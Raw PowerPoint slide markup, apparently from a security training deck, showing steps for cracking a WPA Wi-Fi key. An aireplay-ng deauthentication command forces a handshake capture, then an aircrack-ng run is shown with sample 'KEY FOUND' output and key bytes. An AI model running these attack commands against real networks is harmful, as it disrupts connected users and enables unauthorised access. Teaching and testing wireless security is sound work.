                <a:t>Command Prompt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="104" name="Picture 3" descr="E:\Web2.0 PNG Icons\Windows Command.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{098E4CA0-49D2-40A3-9E79-CBCB5EF9A1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30849" y="1799496"/>
              <a:ext cx="398185" cy="3497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5" name="Picture 3" descr="X:\Maqbool\Icons\x.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{816080F0-E152-45E8-92E3-4D371045D2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2117" y="1854088"/>
              <a:ext cx="228600" cy="2286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1D452F8B-32AF-4827-B59E-273AC9807764}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1563186" y="2257465"/>
              <a:ext cx="4668561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spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>C:\&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>aireplay-ng --deauth 11 -a 02:24:2B:CD:68:EE </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Rectangle 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7776B32C-352A-4C8B-B419-B920C6B7814E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6884316" y="1067966"/>
            <a:ext cx="4976547" cy="7927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US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Deauth the client using Aireplay-ng; the client will try to authenticate with the AP, which will lead to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> capturing an authentication packet (WPA handshake)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr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4AAA8F9F-1710-4A77-8FED-7634253F6AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6947903" y="3392384"/>
            <a:ext cx="4912960" cy="3062961"/>
            <a:chOff x="6858000" y="3390900"/>
            <a:chExt cx="4912960" cy="3062961"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name="Rectangle 108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73E5ACCB-C764-4148-814A-C16FFD37D48B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6858000" y="3405735"/>
              <a:ext cx="4912960" cy="3048126"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Rectangle 109">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0642CBC-8481-434A-9AED-4585579E8B33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6915897" y="3428356"/>
              <a:ext cx="4832843" cy="2984524"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200"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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="111" name="Picture 4" descr="X:\Web2.0 PNG Icons\wifi\Scroll-bar vertical.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0050743-2AD6-4361-BAD4-82D0289FA544}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0">
              <a:picLocks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38428" y="3758839"/>
              <a:ext cx="210312" cy="265176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54A805B4-D192-40A3-9798-8F5657BE8B67}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6858000" y="3390900"/>
              <a:ext cx="4912960" cy="370635"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp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7C8CCC2A-1B10-43C3-AE22-33699369FB90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7381437" y="3408293"/>
              <a:ext cx="1744261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600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Command Prompt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="114" name="Picture 3" descr="E:\Web2.0 PNG Icons\Windows Command.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E8C2A06-6F0F-4E2E-A355-5418A54D9D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48019" y="3398768"/>
              <a:ext cx="398185" cy="3497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5" name="Picture 3" descr="X:\Maqbool\Icons\x.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{914E4C16-993A-4C13-80FF-A1344D8C2F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16339" y="3453360"/>
              <a:ext cx="228600" cy="2286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35AB9A29-8A80-439D-9E75-38090AABE388}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6980356" y="3740433"/>
              <a:ext cx="4535852" cy="271151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000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>C:\&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>aircrack-ng.exe -a 2 -w capture.cap</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Opening capture.cap</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Read 607 packets</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t># BSSIS                   ESSID            Encryption</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1 02:24:2B:CD:68:EE     COMPANYZONE        WPA &lt;1 handshake&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Choosing first network as target.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Opening ../capture.cap</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Pending packets, please wait...</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                		                       Aircrack-ng 0.7 r130</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                		        [00:00:03] 230 keys tested (73.41 k/s)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                                                                                            KEY FOUND! [ passkey ]</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="970" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Master Key     : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="970" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                   	                             39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="970" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    	Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="970" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                     	                             73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="970" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                   	                             AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="970" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                  	                             D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="970" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>   	 EAPOL HMAC  :  52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Rectangle 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E24A2D0-FE23-43F6-B7F9-83A021D2B2E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6884316" y="2998881"/>
            <a:ext cx="4735311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US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Run the capture file through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>aircrack-ng</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="L-Shape 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03F40075-DBE7-49E7-B3FA-D7F24745FB95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="586651" y="606854"/>
            <a:ext cx="1297779" cy="2156192"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16120"/>
              <a:gd name="adj2" fmla="val 1611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2">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2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22" name="L-Shape 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94519EE8-3114-40D8-A0DF-43FB2E2E1AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="547632" y="2189878"/>
            <a:ext cx="1179798" cy="1960175"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16120"/>
              <a:gd name="adj2" fmla="val 16110"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED7D31"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="L-Shape 122">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DF18DEA-A2C0-4437-B45A-043083CD1AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7118614" y="559908"/>
            <a:ext cx="1179798" cy="1960175"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16120"/>
              <a:gd name="adj2" fmla="val 16110"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A5A5A5"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="L-Shape 124">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C0755AA-1D47-406A-93D6-6B85639BDF15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7118613" y="2487543"/>
            <a:ext cx="1179800" cy="1960175"/>
          </a:xfrm>
          <a:prstGeom prst="corner">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16120"/>
              <a:gd name="adj2" fmla="val 16110"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109838551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Oval 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910649" y="2129696"/>
            <a:ext cx="923587" cy="923827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2" tIns="45711" rIns="91422" bIns="45711" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Oval 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910649" y="4521335"/>
            <a:ext cx="923587" cy="92382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2" tIns="45711" rIns="91422" bIns="45711" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" dirty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58" name="Oval 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3883398" y="2129696"/>
            <a:ext cx="923587" cy="923827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2" tIns="45711" rIns="91422" bIns="45711" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" dirty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61" name="Oval 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3883398" y="4521335"/>
            <a:ext cx="923587" cy="923827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2" tIns="45711" rIns="91422" bIns="45711" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" dirty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64" name="Oval 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10036927" y="2129696"/>
            <a:ext cx="923587" cy="923827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2" tIns="45711" rIns="91422" bIns="45711" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" dirty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67" name="Oval 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10036927" y="4521335"/>
            <a:ext cx="923587" cy="923827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2" tIns="45711" rIns="91422" bIns="45711" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
